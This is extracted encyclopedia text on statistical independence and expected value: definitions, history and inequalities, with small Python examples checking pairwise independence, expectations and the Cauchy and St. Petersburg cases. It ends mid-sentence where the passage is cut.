function[3]: p. 15 or equivalently, if theprobability densitiesfX(x){\displaystyle f_{X}(x)}andfY(y){\displaystyle f_{Y}(y)}and the joint probability densityfX,Y(x,y){\displaystyle f_{X,Y}(x,y)}exist, A finite set ofn{\displaystyle n}random variables{X1,…,Xn}{\displaystyle \{X_{1},\ldots ,X_{n}\}}ispairwise independentif and only if every pair of random variables is independent. Even if the set of random variables is pairwise independent, it is not necessarilymutually independentas defined next. A finite set ofn{\displaystyle n}random variables{X1,…,Xn}{\displaystyle \{X_{1},\ldots ,X_{n}\}}ismutually independentif and only if for any sequence of numbers{x1,…,xn}{\displaystyle \{x_{1},\ldots ,x_{n}\}}, the events{X1≤x1},…,{Xn≤xn}{\displaystyle \{X_{1}\leq x_{1}\},\ldots ,\{X_{n}\leq x_{n}\}}are mutually independent events (as defined above inEq.3). This is equivalent to the following condition on the joint cumulative distribution functionFX1,…,Xn(x1,…,xn){\displaystyle F_{X_{1},\ldots ,X_{n}}(x_{1},\ldots ,x_{n})}.A finite set ofn{\displaystyle n}random variables{X1,…,Xn}{\displaystyle \{X_{1},\ldots ,X_{n}\}}is mutually independent if and only if[3]: p. 16 It is not necessary here to require that the probability distribution factorizes for all possiblek{\displaystyle k}-elementsubsets as in the case forn{\displaystyle n}events. 
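A standard illustration of pairwise-but-not-mutual independence (this coin-flip construction is my own choice, not the probability-space example used later in the article) can be checked exhaustively:

```python
from itertools import product

# Two fair coin flips; A = "first is heads", B = "second is heads", C = "the flips agree".
outcomes = list(product("HT", repeat=2))       # 4 equally likely outcomes

def P(event):
    return sum(1 for w in outcomes if event(w)) / len(outcomes)

A = lambda w: w[0] == "H"
B = lambda w: w[1] == "H"
C = lambda w: w[0] == w[1]

pairs = [(A, B), (A, C), (B, C)]
print([P(lambda w, e=e, f=f: e(w) and f(w)) == P(e) * P(f) for e, f in pairs])
# [True, True, True]  -> every pair is independent
print(P(lambda w: A(w) and B(w) and C(w)), P(A) * P(B) * P(C))
# 0.25 vs 0.125       -> the multiplication rule fails for all three together
```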
This is not required because e.g.FX1,X2,X3(x1,x2,x3)=FX1(x1)⋅FX2(x2)⋅FX3(x3){\displaystyle F_{X_{1},X_{2},X_{3}}(x_{1},x_{2},x_{3})=F_{X_{1}}(x_{1})\cdot F_{X_{2}}(x_{2})\cdot F_{X_{3}}(x_{3})}impliesFX1,X3(x1,x3)=FX1(x1)⋅FX3(x3){\displaystyle F_{X_{1},X_{3}}(x_{1},x_{3})=F_{X_{1}}(x_{1})\cdot F_{X_{3}}(x_{3})}. The measure-theoretically inclined reader may prefer to substitute events{X∈A}{\displaystyle \{X\in A\}}for events{X≤x}{\displaystyle \{X\leq x\}}in the above definition, whereA{\displaystyle A}is anyBorel set. That definition is exactly equivalent to the one above when the values of the random variables arereal numbers. It has the advantage of working also for complex-valued random variables or for random variables taking values in anymeasurable space(which includestopological spacesendowed by appropriate σ-algebras). Two random vectorsX=(X1,…,Xm)T{\displaystyle \mathbf {X} =(X_{1},\ldots ,X_{m})^{\mathrm {T} }}andY=(Y1,…,Yn)T{\displaystyle \mathbf {Y} =(Y_{1},\ldots ,Y_{n})^{\mathrm {T} }}are called independent if[5]: p. 187 whereFX(x){\displaystyle F_{\mathbf {X} }(\mathbf {x} )}andFY(y){\displaystyle F_{\mathbf {Y} }(\mathbf {y} )}denote the cumulative distribution functions ofX{\displaystyle \mathbf {X} }andY{\displaystyle \mathbf {Y} }andFX,Y(x,y){\displaystyle F_{\mathbf {X,Y} }(\mathbf {x,y} )}denotes their joint cumulative distribution function. Independence ofX{\displaystyle \mathbf {X} }andY{\displaystyle \mathbf {Y} }is often denoted byX⊥⊥Y{\displaystyle \mathbf {X} \perp \!\!\!\perp \mathbf {Y} }. Written component-wise,X{\displaystyle \mathbf {X} }andY{\displaystyle \mathbf {Y} }are called independent if The definition of independence may be extended from random vectors to astochastic process. Therefore, it is required for an independent stochastic process that the random variables obtained by sampling the process at anyn{\displaystyle n}timest1,…,tn{\displaystyle t_{1},\ldots ,t_{n}}are independent random variables for anyn{\displaystyle n}.[6]: p. 163 Formally, a stochastic process{Xt}t∈T{\displaystyle \left\{X_{t}\right\}_{t\in {\mathcal {T}}}}is called independent, if and only if for alln∈N{\displaystyle n\in \mathbb {N} }and for allt1,…,tn∈T{\displaystyle t_{1},\ldots ,t_{n}\in {\mathcal {T}}} whereFXt1,…,Xtn(x1,…,xn)=P(X(t1)≤x1,…,X(tn)≤xn){\displaystyle F_{X_{t_{1}},\ldots ,X_{t_{n}}}(x_{1},\ldots ,x_{n})=\mathrm {P} (X(t_{1})\leq x_{1},\ldots ,X(t_{n})\leq x_{n})}.Independence of a stochastic process is a propertywithina stochastic process, not between two stochastic processes. Independence of two stochastic processes is a property between two stochastic processes{Xt}t∈T{\displaystyle \left\{X_{t}\right\}_{t\in {\mathcal {T}}}}and{Yt}t∈T{\displaystyle \left\{Y_{t}\right\}_{t\in {\mathcal {T}}}}that are defined on the same probability space(Ω,F,P){\displaystyle (\Omega ,{\mathcal {F}},P)}. Formally, two stochastic processes{Xt}t∈T{\displaystyle \left\{X_{t}\right\}_{t\in {\mathcal {T}}}}and{Yt}t∈T{\displaystyle \left\{Y_{t}\right\}_{t\in {\mathcal {T}}}}are said to be independent if for alln∈N{\displaystyle n\in \mathbb {N} }and for allt1,…,tn∈T{\displaystyle t_{1},\ldots ,t_{n}\in {\mathcal {T}}}, the random vectors(X(t1),…,X(tn)){\displaystyle (X(t_{1}),\ldots ,X(t_{n}))}and(Y(t1),…,Y(tn)){\displaystyle (Y(t_{1}),\ldots ,Y(t_{n}))}are independent,[7]: p. 515i.e. if The definitions above (Eq.1andEq.2) are both generalized by the following definition of independence forσ-algebras. 
Let(Ω,Σ,P){\displaystyle (\Omega ,\Sigma ,\mathrm {P} )}be a probability space and letA{\displaystyle {\mathcal {A}}}andB{\displaystyle {\mathcal {B}}}be two sub-σ-algebras ofΣ{\displaystyle \Sigma }.A{\displaystyle {\mathcal {A}}}andB{\displaystyle {\mathcal {B}}}are said to be independent if, wheneverA∈A{\displaystyle A\in {\mathcal {A}}}andB∈B{\displaystyle B\in {\mathcal {B}}}, Likewise, a finite family of σ-algebras(τi)i∈I{\displaystyle (\tau _{i})_{i\in I}}, whereI{\displaystyle I}is anindex set, is said to be independent if and only if and an infinite family of σ-algebras is said to be independent if all its finite subfamilies are independent. The new definition relates to the previous ones very directly: Using this definition, it is easy to show that ifX{\displaystyle X}andY{\displaystyle Y}are random variables andY{\displaystyle Y}is constant, thenX{\displaystyle X}andY{\displaystyle Y}are independent, since the σ-algebra generated by a constant random variable is the trivial σ-algebra{∅,Ω}{\displaystyle \{\varnothing ,\Omega \}}. Probability zero events cannot affect independence so independence also holds ifY{\displaystyle Y}is only Pr-almost surelyconstant. Note that an event is independent of itself if and only if Thus an event is independent of itself if and only if italmost surelyoccurs or itscomplementalmost surely occurs; this fact is useful when provingzero–one laws.[8] IfX{\displaystyle X}andY{\displaystyle Y}are statistically independent random variables, then theexpectation operatorE{\displaystyle \operatorname {E} }has the property and thecovariancecov⁡[X,Y]{\displaystyle \operatorname {cov} [X,Y]}is zero, as follows from The converse does not hold: if two random variables have a covariance of 0 they still may be not independent. Similarly for two stochastic processes{Xt}t∈T{\displaystyle \left\{X_{t}\right\}_{t\in {\mathcal {T}}}}and{Yt}t∈T{\displaystyle \left\{Y_{t}\right\}_{t\in {\mathcal {T}}}}: If they are independent, then they areuncorrelated.[10]: p. 151 Two random variablesX{\displaystyle X}andY{\displaystyle Y}are independent if and only if thecharacteristic functionof the random vector(X,Y){\displaystyle (X,Y)}satisfies In particular the characteristic function of their sum is the product of their marginal characteristic functions: though the reverse implication is not true. Random variables that satisfy the latter condition are calledsubindependent. The event of getting a 6 the first time a die is rolled and the event of getting a 6 the second time areindependent. By contrast, the event of getting a 6 the first time a die is rolled and the event that the sum of the numbers seen on the first and second trial is 8 arenotindependent. If two cards are drawnwithreplacement from a deck of cards, the event of drawing a red card on the first trial and that of drawing a red card on the second trial areindependent. By contrast, if two cards are drawnwithoutreplacement from a deck of cards, the event of drawing a red card on the first trial and that of drawing a red card on the second trial arenotindependent, because a deck that has had a red card removed has proportionately fewer red cards. Consider the two probability spaces shown. In both cases,P(A)=P(B)=1/2{\displaystyle \mathrm {P} (A)=\mathrm {P} (B)=1/2}andP(C)=1/4{\displaystyle \mathrm {P} (C)=1/4}. 
The events in the first space are pairwise independent becauseP(A|B)=P(A|C)=1/2=P(A){\displaystyle \mathrm {P} (A|B)=\mathrm {P} (A|C)=1/2=\mathrm {P} (A)},P(B|A)=P(B|C)=1/2=P(B){\displaystyle \mathrm {P} (B|A)=\mathrm {P} (B|C)=1/2=\mathrm {P} (B)}, andP(C|A)=P(C|B)=1/4=P(C){\displaystyle \mathrm {P} (C|A)=\mathrm {P} (C|B)=1/4=\mathrm {P} (C)}; but the three events are not mutually independent. The events in the second space are both pairwise independent and mutually independent. To illustrate the difference, consider conditioning on two events. In the pairwise independent case, although any one event is independent of each of the other two individually, it is not independent of the intersection of the other two: In the mutually independent case, however, It is possible to create a three-event example in which and yet no two of the three events are pairwise independent (and hence the set of events are not mutually independent).[11]This example shows that mutual independence involves requirements on the products of probabilities of all combinations of events, not just the single events as in this example. The eventsA{\displaystyle A}andB{\displaystyle B}are conditionally independent given an eventC{\displaystyle C}when P(A∩B∣C)=P(A∣C)⋅P(B∣C){\displaystyle \mathrm {P} (A\cap B\mid C)=\mathrm {P} (A\mid C)\cdot \mathrm {P} (B\mid C)}. Intuitively, two random variablesX{\displaystyle X}andY{\displaystyle Y}are conditionally independent givenZ{\displaystyle Z}if, onceZ{\displaystyle Z}is known, the value ofY{\displaystyle Y}does not add any additional information aboutX{\displaystyle X}. For instance, two measurementsX{\displaystyle X}andY{\displaystyle Y}of the same underlying quantityZ{\displaystyle Z}are not independent, but they are conditionally independent givenZ{\displaystyle Z}(unless the errors in the two measurements are somehow connected). The formal definition of conditional independence is based on the idea ofconditional distributions. IfX{\displaystyle X},Y{\displaystyle Y}, andZ{\displaystyle Z}arediscrete random variables, then we defineX{\displaystyle X}andY{\displaystyle Y}to be conditionally independent givenZ{\displaystyle Z}if for allx{\displaystyle x},y{\displaystyle y}andz{\displaystyle z}such thatP(Z=z)>0{\displaystyle \mathrm {P} (Z=z)>0}. On the other hand, if the random variables arecontinuousand have a jointprobability density functionfXYZ(x,y,z){\displaystyle f_{XYZ}(x,y,z)}, thenX{\displaystyle X}andY{\displaystyle Y}are conditionally independent givenZ{\displaystyle Z}if for all real numbersx{\displaystyle x},y{\displaystyle y}andz{\displaystyle z}such thatfZ(z)>0{\displaystyle f_{Z}(z)>0}. If discreteX{\displaystyle X}andY{\displaystyle Y}are conditionally independent givenZ{\displaystyle Z}, then for anyx{\displaystyle x},y{\displaystyle y}andz{\displaystyle z}withP(Z=z)>0{\displaystyle \mathrm {P} (Z=z)>0}. That is, the conditional distribution forX{\displaystyle X}givenY{\displaystyle Y}andZ{\displaystyle Z}is the same as that givenZ{\displaystyle Z}alone. A similar equation holds for the conditional probability density functions in the continuous case. Independence can be seen as a special kind of conditional independence, since probability can be seen as a kind of conditional probability given no events. Before 1933, independence, in probability theory, was defined in a verbal manner. 
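Returning to the conditional-independence notion just defined, here is a small simulation sketch of the intuition that two measurements of the same underlying quantity are dependent on their own but conditionally independent given that quantity. NumPy is assumed, and the noise levels and the slice of Z values used as a rough stand-in for conditioning are arbitrary choices made for illustration.

```python
import numpy as np

rng = np.random.default_rng(0)
n = 200_000

# Common underlying quantity Z, measured twice with independent noise.
Z = rng.normal(0.0, 1.0, n)
X = Z + rng.normal(0.0, 0.3, n)
Y = Z + rng.normal(0.0, 0.3, n)

# Marginally, X and Y are strongly correlated because they share Z.
print(round(np.corrcoef(X, Y)[0, 1], 2))              # roughly 0.92

# Restricting to a thin slice of Z values (a crude proxy for conditioning on Z)
# removes the association, as conditional independence given Z predicts.
mask = np.abs(Z - 0.5) < 0.05
print(round(np.corrcoef(X[mask], Y[mask])[0, 1], 2))  # close to 0
```

Correlation only detects linear association, so this is a sanity check of the idea rather than a proof of conditional independence.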
De Moivre, for example, gave the following definition: "Two events are independent, when they have no connexion one with the other, and that the happening of one neither forwards nor obstructs the happening of the other".[12] If there are n independent events, the probability that all of them happen was computed as the product of the probabilities of these n events. Apparently there was a conviction that this formula was a consequence of the above definition (it was sometimes called the Multiplication Theorem), but of course a proof of that assertion cannot work without further, more formal tacit assumptions. The definition of independence given in this article became the standard definition (now used in all books) after it appeared in 1933 as part of Kolmogorov's axiomatization of probability.[13] Kolmogorov credited it to S. N. Bernstein, and quoted a publication which had appeared in Russian in 1927.[14] Unfortunately, both Bernstein and Kolmogorov were unaware of the work of Georg Bohlmann. Bohlmann had given the same definition for two events in 1901[15] and for n events in 1908.[16] In the latter paper he studied his notion in detail; for example, he gave the first example showing that pairwise independence does not imply mutual independence. Even today, Bohlmann is rarely cited. More about his work can be found in On the contributions of Georg Bohlmann to probability theory by Ulrich Krengel.[17]
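As a concrete check of the pairwise-versus-mutual distinction first exhibited by Bohlmann and discussed above, the following sketch builds three events on the two-fair-coin sample space that are pairwise independent but not mutually independent. The event names and the use of exact fractions are choices made here for illustration.

```python
from itertools import product
from fractions import Fraction

# Sample space: two fair coin tosses, each outcome has probability 1/4.
omega = list(product("HT", repeat=2))
prob = {w: Fraction(1, 4) for w in omega}

# A = first toss heads, B = second toss heads, C = the two tosses differ.
A = {w for w in omega if w[0] == "H"}
B = {w for w in omega if w[1] == "H"}
C = {w for w in omega if w[0] != w[1]}

def P(event):
    return sum(prob[w] for w in event)

# Pairwise independence: P(X ∩ Y) = P(X) P(Y) holds for every pair.
pairs = [(A, B), (A, C), (B, C)]
print(all(P(x & y) == P(x) * P(y) for x, y in pairs))   # True

# Mutual independence fails: P(A ∩ B ∩ C) = 0, while P(A) P(B) P(C) = 1/8.
print(P(A & B & C) == P(A) * P(B) * P(C))               # False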
https://en.wikipedia.org/wiki/Independence_(probability_theory)
Inprobability theory, theexpected value(also calledexpectation,expectancy,expectation operator,mathematical expectation,mean,expectation value, orfirstmoment) is a generalization of theweighted average. Informally, the expected value is themeanof the possible values arandom variablecan take, weighted by the probability of those outcomes. Since it is obtained through arithmetic, the expected value sometimes may not even be included in the sample data set; it is not the value you would expect to get in reality. The expected value of a random variable with a finite number of outcomes is a weighted average of all possible outcomes. In the case of a continuum of possible outcomes, the expectation is defined byintegration. In the axiomatic foundation for probability provided bymeasure theory, the expectation is given byLebesgue integration. The expected value of a random variableXis often denoted byE(X),E[X], orEX, withEalso often stylized asE{\displaystyle \mathbb {E} }orE.[1][2][3] The idea of the expected value originated in the middle of the 17th century from the study of the so-calledproblem of points, which seeks to divide the stakesin a fair waybetween two players, who have to end their game before it is properly finished.[4]This problem had been debated for centuries. Many conflicting proposals and solutions had been suggested over the years when it was posed toBlaise Pascalby French writer and amateur mathematicianChevalier de Méréin 1654. Méré claimed that this problem could not be solved and that it showed just how flawed mathematics was when it came to its application to the real world. Pascal, being a mathematician, was provoked and determined to solve the problem once and for all. He began to discuss the problem in the famous series of letters toPierre de Fermat. Soon enough, they both independently came up with a solution. They solved the problem in different computational ways, but their results were identical because their computations were based on the same fundamental principle. The principle is that the value of a future gain should be directly proportional to the chance of getting it. This principle seemed to have come naturally to both of them. They were very pleased by the fact that they had found essentially the same solution, and this in turn made them absolutely convinced that they had solved the problem conclusively; however, they did not publish their findings. They only informed a small circle of mutual scientific friends in Paris about it.[5] In Dutch mathematicianChristiaan Huygens'book, he considered the problem of points, and presented a solution based on the same principle as the solutions of Pascal and Fermat. Huygens published his treatise in 1657, (seeHuygens (1657)) "De ratiociniis in ludo aleæ" on probability theory just after visiting Paris. The book extended the concept of expectation by adding rules for how to calculate expectations in more complicated situations than the original problem (e.g., for three or more players), and can be seen as the first successful attempt at laying down the foundations of thetheory of probability. In the foreword to his treatise, Huygens wrote: It should be said, also, that for some time some of the best mathematicians of France have occupied themselves with this kind of calculus so that no one should attribute to me the honour of the first invention. This does not belong to me. 
But these savants, although they put each other to the test by proposing to each other many questions difficult to solve, have hidden their methods. I have had therefore to examine and go deeply for myself into this matter by beginning with the elements, and it is impossible for me for this reason to affirm that I have even started from the same principle. But finally I have found that my answers in many cases do not differ from theirs. In the mid-nineteenth century,Pafnuty Chebyshevbecame the first person to think systematically in terms of the expectations ofrandom variables.[6] Neither Pascal nor Huygens used the term "expectation" in its modern sense. In particular, Huygens writes:[7] That any one Chance or Expectation to win any thing is worth just such a Sum, as wou'd procure in the same Chance and Expectation at a fair Lay. ... If I expect a or b, and have an equal chance of gaining them, my Expectation is worth (a+b)/2. More than a hundred years later, in 1814,Pierre-Simon Laplacepublished his tract "Théorie analytique des probabilités", where the concept of expected value was defined explicitly:[8] ... this advantage in the theory of chance is the product of the sum hoped for by the probability of obtaining it; it is the partial sum which ought to result when we do not wish to run the risks of the event in supposing that the division is made proportional to the probabilities. This division is the only equitable one when all strange circumstances are eliminated; because an equal degree of probability gives an equal right for the sum hoped for. We will call this advantagemathematical hope. The use of the letterEto denote "expected value" goes back toW. A. Whitworthin 1901.[9]The symbol has since become popular for English writers. In German,Estands forErwartungswert, in Spanish foresperanza matemática, and in French forespérance mathématique.[10] When "E" is used to denote "expected value", authors use a variety of stylizations: the expectation operator can be stylized asE(upright),E(italic), orE{\displaystyle \mathbb {E} }(inblackboard bold), while a variety of bracket notations (such asE(X),E[X], andEX) are all used. Another popular notation isμX.⟨X⟩,⟨X⟩av, andX¯{\displaystyle {\overline {X}}}are commonly used in physics.[11]M(X)is used in Russian-language literature. As discussed above, there are several context-dependent ways of defining the expected value. The simplest and original definition deals with the case of finitely many possible outcomes, such as in the flip of a coin. With the theory of infinite series, this can be extended to the case of countably many possible outcomes. It is also very common to consider the distinct case of random variables dictated by (piecewise-)continuousprobability density functions, as these arise in many natural contexts. All of these specific definitions may be viewed as special cases of the general definition based upon the mathematical tools ofmeasure theoryandLebesgue integration, which provide these different contexts with an axiomatic foundation and common language. Any definition of expected value may be extended to define an expected value of a multidimensional random variable, i.e. arandom vectorX. It is defined component by component, asE[X]i= E[Xi]. Similarly, one may define the expected value of arandom matrixXwith componentsXijbyE[X]ij= E[Xij]. Consider a random variableXwith afinitelistx1, ...,xkof possible outcomes, each of which (respectively) has probabilityp1, ...,pkof occurring. 
The expectation ofXis defined as[12]E⁡[X]=x1p1+x2p2+⋯+xkpk.{\displaystyle \operatorname {E} [X]=x_{1}p_{1}+x_{2}p_{2}+\cdots +x_{k}p_{k}.} Since the probabilities must satisfyp1+ ⋅⋅⋅ +pk= 1, it is natural to interpretE[X]as aweighted averageof thexivalues, with weights given by their probabilitiespi. In the special case that all possible outcomes areequiprobable(that is,p1= ⋅⋅⋅ =pk), the weighted average is given by the standardaverage. In the general case, the expected value takes into account the fact that some outcomes are more likely than others. Informally, the expectation of a random variable with acountably infinite setof possible outcomes is defined analogously as the weighted average of all possible outcomes, where the weights are given by the probabilities of realizing each given value. This is to say thatE⁡[X]=∑i=1∞xipi,{\displaystyle \operatorname {E} [X]=\sum _{i=1}^{\infty }x_{i}\,p_{i},}wherex1,x2, ...are the possible outcomes of the random variableXandp1,p2, ...are their corresponding probabilities. In many non-mathematical textbooks, this is presented as the full definition of expected values in this context.[13] However, there are some subtleties with infinite summation, so the above formula is not suitable as a mathematical definition. In particular, theRiemann series theoremofmathematical analysisillustrates that the value of certain infinite sums involving positive and negative summands depends on the order in which the summands are given. Since the outcomes of a random variable have no naturally given order, this creates a difficulty in defining expected value precisely. For this reason, many mathematical textbooks only consider the case that the infinite sum given aboveconverges absolutely, which implies that the infinite sum is a finite number independent of the ordering of summands.[14]In the alternative case that the infinite sum does not converge absolutely, one says the random variabledoes not have finite expectation.[14] Now consider a random variableXwhich has aprobability density functiongiven by a functionfon thereal number line. This means that the probability ofXtaking on a value in any givenopen intervalis given by theintegraloffover that interval. The expectation ofXis then given by the integral[15]E⁡[X]=∫−∞∞xf(x)dx.{\displaystyle \operatorname {E} [X]=\int _{-\infty }^{\infty }xf(x)\,dx.}A general and mathematically precise formulation of this definition usesmeasure theoryandLebesgue integration, and the corresponding theory ofabsolutely continuous random variablesis described in the next section. The density functions of many common distributions arepiecewise continuous, and as such the theory is often developed in this restricted setting.[16]For such functions, it is sufficient to only consider the standardRiemann integration. Sometimescontinuous random variablesare defined as those corresponding to this special class of densities, although the term is used differently by various authors. Analogously to the countably-infinite case above, there are subtleties with this expression due to the infinite region of integration. Such subtleties can be seen concretely if the distribution ofXis given by theCauchy distributionCauchy(0, π), so thatf(x) = (x2+ π2)−1. 
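As a quick numerical illustration of the finite and continuous definitions above, the following sketch computes a weighted average directly and evaluates the integral of x f(x) by numerical quadrature. The loaded-die weights and the exponential rate are arbitrary choices, and SciPy is assumed to be available; the Cauchy example introduced just above is taken up again right after this sketch.

```python
import numpy as np
from scipy.integrate import quad

# Finite case: E[X] is the probability-weighted average of the outcomes.
outcomes = np.array([1, 2, 3, 4, 5, 6])
probs    = np.array([0.1, 0.1, 0.1, 0.1, 0.1, 0.5])   # a loaded die
print(np.dot(outcomes, probs))                         # approximately 4.5

# Continuous case: E[X] = integral of x f(x) dx for an exponential density, rate 2.
rate = 2.0
f = lambda x: rate * np.exp(-rate * x)
mean, _ = quad(lambda x: x * f(x), 0, np.inf)
print(round(mean, 6))                                  # 0.5, i.e. 1/rate
```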
It is straightforward to compute in this case that∫abxf(x)dx=∫abxx2+π2dx=12ln⁡b2+π2a2+π2.{\displaystyle \int _{a}^{b}xf(x)\,dx=\int _{a}^{b}{\frac {x}{x^{2}+\pi ^{2}}}\,dx={\frac {1}{2}}\ln {\frac {b^{2}+\pi ^{2}}{a^{2}+\pi ^{2}}}.}The limit of this expression asa→ −∞andb→ ∞does not exist: if the limits are taken so thata= −b, then the limit is zero, while if the constraint2a= −bis taken, then the limit isln(2). To avoid such ambiguities, in mathematical textbooks it is common to require that the given integralconverges absolutely, withE[X]left undefined otherwise.[17]However, measure-theoretic notions as given below can be used to give a systematic definition ofE[X]for more general random variablesX. All definitions of the expected value may be expressed in the language ofmeasure theory. In general, ifXis a real-valuedrandom variabledefined on aprobability space(Ω, Σ, P), then the expected value ofX, denoted byE[X], is defined as theLebesgue integral[18]E⁡[X]=∫ΩXdP.{\displaystyle \operatorname {E} [X]=\int _{\Omega }X\,d\operatorname {P} .}Despite the newly abstract situation, this definition is extremely similar in nature to the very simplest definition of expected values, given above, as certain weighted averages. This is because, in measure theory, the value of the Lebesgue integral ofXis defined via weighted averages ofapproximationsofXwhich take on finitely many values.[19]Moreover, if given a random variable with finitely or countably many possible values, the Lebesgue theory of expectation is identical to the summation formulas given above. However, the Lebesgue theory clarifies the scope of the theory of probability density functions. A random variableXis said to beabsolutely continuousif any of the following conditions are satisfied: These conditions are all equivalent, although this is nontrivial to establish.[20]In this definition,fis called theprobability density functionofX(relative to Lebesgue measure). According to the change-of-variables formula for Lebesgue integration,[21]combined with thelaw of the unconscious statistician,[22]it follows thatE⁡[X]≡∫ΩXdP=∫Rxf(x)dx{\displaystyle \operatorname {E} [X]\equiv \int _{\Omega }X\,d\operatorname {P} =\int _{\mathbb {R} }xf(x)\,dx}for any absolutely continuous random variableX. The above discussion of continuous random variables is thus a special case of the general Lebesgue theory, due to the fact that every piecewise-continuous function is measurable. The expected value of any real-valued random variableX{\displaystyle X}can also be defined on the graph of itscumulative distribution functionF{\displaystyle F}by a nearby equality of areas. In fact,E⁡[X]=μ{\displaystyle \operatorname {E} [X]=\mu }with a real numberμ{\displaystyle \mu }if and only if the two surfaces in thex{\displaystyle x}-y{\displaystyle y}-plane, described byx≤μ,0≤y≤F(x)orx≥μ,F(x)≤y≤1{\displaystyle x\leq \mu ,\;\,0\leq y\leq F(x)\quad {\text{or}}\quad x\geq \mu ,\;\,F(x)\leq y\leq 1}respectively, have the same finite area, i.e. if∫−∞μF(x)dx=∫μ∞(1−F(x))dx{\displaystyle \int _{-\infty }^{\mu }F(x)\,dx=\int _{\mu }^{\infty }{\big (}1-F(x){\big )}\,dx}and bothimproper Riemann integralsconverge. Finally, this is equivalent to the representationE⁡[X]=∫0∞(1−F(x))dx−∫−∞0F(x)dx,{\displaystyle \operatorname {E} [X]=\int _{0}^{\infty }{\bigl (}1-F(x){\bigr )}\,dx-\int _{-\infty }^{0}F(x)\,dx,}also with convergent integrals.[23] Expected values as defined above are automatically finite numbers. 
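The ambiguity in the Cauchy example can be checked directly from the closed form just computed; the truncation points below are arbitrarily large numbers chosen only for illustration.

```python
import math

# Closed form from the computation above:
# integral over [a, b] of x f(x) dx = (1/2) ln((b^2 + pi^2) / (a^2 + pi^2)).
def truncated_mean(a, b):
    return 0.5 * math.log((b * b + math.pi ** 2) / (a * a + math.pi ** 2))

# Symmetric truncation a = -b stays at 0 for every b ...
print(truncated_mean(-1e8, 1e8))        # 0.0

# ... but with b = -2a the value tends to ln 2, so the improper integral
# (and hence E[X]) has no unambiguous value.
print(truncated_mean(-1e8, 2e8))        # approximately 0.6931
print(math.log(2))
```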
However, in many cases it is fundamental to be able to consider expected values of±∞. This is intuitive, for example, in the case of theSt. Petersburg paradox, in which one considers a random variable with possible outcomesxi= 2i, with associated probabilitiespi= 2−i, foriranging over all positive integers. According to the summation formula in the case of random variables with countably many outcomes, one hasE⁡[X]=∑i=1∞xipi=2⋅12+4⋅14+8⋅18+16⋅116+⋯=1+1+1+1+⋯.{\displaystyle \operatorname {E} [X]=\sum _{i=1}^{\infty }x_{i}\,p_{i}=2\cdot {\frac {1}{2}}+4\cdot {\frac {1}{4}}+8\cdot {\frac {1}{8}}+16\cdot {\frac {1}{16}}+\cdots =1+1+1+1+\cdots .}It is natural to say that the expected value equals+∞. There is a rigorous mathematical theory underlying such ideas, which is often taken as part of the definition of the Lebesgue integral.[19]The first fundamental observation is that, whichever of the above definitions are followed, anynonnegativerandom variable whatsoever can be given an unambiguous expected value; whenever absolute convergence fails, then the expected value can be defined as+∞. The second fundamental observation is that any random variable can be written as the difference of two nonnegative random variables. Given a random variableX, one defines thepositive and negative partsbyX+= max(X, 0)andX−= −min(X, 0). These are nonnegative random variables, and it can be directly checked thatX=X+−X−. SinceE[X+]andE[X−]are both then defined as either nonnegative numbers or+∞, it is then natural to define:E⁡[X]={E⁡[X+]−E⁡[X−]ifE⁡[X+]<∞andE⁡[X−]<∞;+∞ifE⁡[X+]=∞andE⁡[X−]<∞;−∞ifE⁡[X+]<∞andE⁡[X−]=∞;undefinedifE⁡[X+]=∞andE⁡[X−]=∞.{\displaystyle \operatorname {E} [X]={\begin{cases}\operatorname {E} [X^{+}]-\operatorname {E} [X^{-}]&{\text{if }}\operatorname {E} [X^{+}]<\infty {\text{ and }}\operatorname {E} [X^{-}]<\infty ;\\+\infty &{\text{if }}\operatorname {E} [X^{+}]=\infty {\text{ and }}\operatorname {E} [X^{-}]<\infty ;\\-\infty &{\text{if }}\operatorname {E} [X^{+}]<\infty {\text{ and }}\operatorname {E} [X^{-}]=\infty ;\\{\text{undefined}}&{\text{if }}\operatorname {E} [X^{+}]=\infty {\text{ and }}\operatorname {E} [X^{-}]=\infty .\end{cases}}} According to this definition,E[X]exists and is finite if and only ifE[X+]andE[X−]are both finite. Due to the formula|X| =X++X−, this is the case if and only ifE|X|is finite, and this is equivalent to the absolute convergence conditions in the definitions above. As such, the present considerations do not define finite expected values in any cases not previously considered; they are only useful for infinite expectations. The following table gives the expected values of some commonly occurringprobability distributions. The third column gives the expected values both in the form immediately given by the definition, as well as in the simplified form obtained by computation therefrom. The details of these computations, which are not always straightforward, can be found in the indicated references. The basic properties below (and their names in bold) replicate or follow immediately from those ofLebesgue integral. Note that the letters "a.s." stand for "almost surely"—a central property of the Lebesgue integral. 
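A short sketch of the St. Petersburg computation above: every term 2^i · 2^(−i) contributes exactly 1, so the partial sums grow without bound, matching the assignment E[X] = +∞.

```python
# Partial sums of the St. Petersburg expectation: outcome x_i = 2**i occurs with
# probability p_i = 2**(-i), so each term contributes 1 and the sum diverges.
total = 0.0
for i in range(1, 31):
    total += (2 ** i) * (2.0 ** -i)
    if i % 10 == 0:
        print(i, total)      # prints 10 10.0, 20 20.0, 30 30.0
```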
Basically, one says that an inequality likeX≥0{\displaystyle X\geq 0}is true almost surely, when the probability measure attributes zero-mass to the complementary event{X<0}.{\displaystyle \left\{X<0\right\}.} Concentration inequalitiescontrol the likelihood of a random variable taking on large values.Markov's inequalityis among the best-known and simplest to prove: for anonnegativerandom variableXand any positive numbera, it states that[37]P⁡(X≥a)≤E⁡[X]a.{\displaystyle \operatorname {P} (X\geq a)\leq {\frac {\operatorname {E} [X]}{a}}.} IfXis any random variable with finite expectation, then Markov's inequality may be applied to the random variable|X−E[X]|2to obtainChebyshev's inequalityP⁡(|X−E[X]|≥a)≤Var⁡[X]a2,{\displaystyle \operatorname {P} (|X-{\text{E}}[X]|\geq a)\leq {\frac {\operatorname {Var} [X]}{a^{2}}},}whereVaris thevariance.[37]These inequalities are significant for their nearly complete lack of conditional assumptions. For example, for any random variable with finite expectation, the Chebyshev inequality implies that there is at least a 75% probability of an outcome being within twostandard deviationsof the expected value. However, in special cases the Markov and Chebyshev inequalities often give much weaker information than is otherwise available. For example, in the case of an unweighted dice, Chebyshev's inequality says that odds of rolling between 1 and 6 is at least 53%; in reality, the odds are of course 100%.[38]TheKolmogorov inequalityextends the Chebyshev inequality to the context of sums of random variables.[39] The following three inequalities are of fundamental importance in the field ofmathematical analysisand its applications to probability theory. The Hölder and Minkowski inequalities can be extended to generalmeasure spaces, and are often given in that context. By contrast, the Jensen inequality is special to the case of probability spaces. In general, it is not the case thatE⁡[Xn]→E⁡[X]{\displaystyle \operatorname {E} [X_{n}]\to \operatorname {E} [X]}even ifXn→X{\displaystyle X_{n}\to 